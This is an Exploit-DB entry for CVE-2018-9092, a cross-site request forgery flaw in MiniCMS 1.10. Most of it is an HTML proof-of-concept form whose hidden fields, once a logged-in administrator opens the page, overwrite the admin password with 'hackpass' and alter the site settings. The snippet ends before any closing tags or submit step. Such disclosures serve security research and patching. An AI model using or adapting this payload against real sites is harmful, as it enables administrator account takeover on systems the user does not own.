MiniCMS 1.10 - Cross-Site Request Forgery

ID EDB-ID:44362
Type exploitdb
Reporter Exploit-DB
Modified 2018-03-30T00:00:00


MiniCMS 1.10 - Cross-Site Request Forgery. CVE-2018-9092. Webapps exploit for PHP platform. Tags: Cross-Site Request Forgery (CSRF)

# Exploit Title:  MiniCMS 1.10 CSRF Vulnerability
# Date: 2018-03-28
# Exploit Author: zixian(、
# Vendor Homepage:
# Software Link:
# Version: 1.10
# CVE : CVE-2018-9092

There is a CSRF vulnerability that can change the administrator account password
After the administrator logged in, open the following page

 <head><meta http-equiv="Content-Type" content="text/html; charset=GB2312">
 <form action="" method="post">
 <input type="hidden" name="site_name" value="hack123" />  
 <input type="hidden" name="site_desc" value="hacktest" />  
 <input type="hidden" name="site_link" value="" />  
 <input type="hidden" name="user_nick" value="hack" />  
 <input type="hidden" name="user_name" value="admin" />  
 <input type="hidden" name="user_pass" value="hackpass" />  
 <input type="hidden" name="comment_code" value="" />  
 <input type="hidden" name="save" value=" " />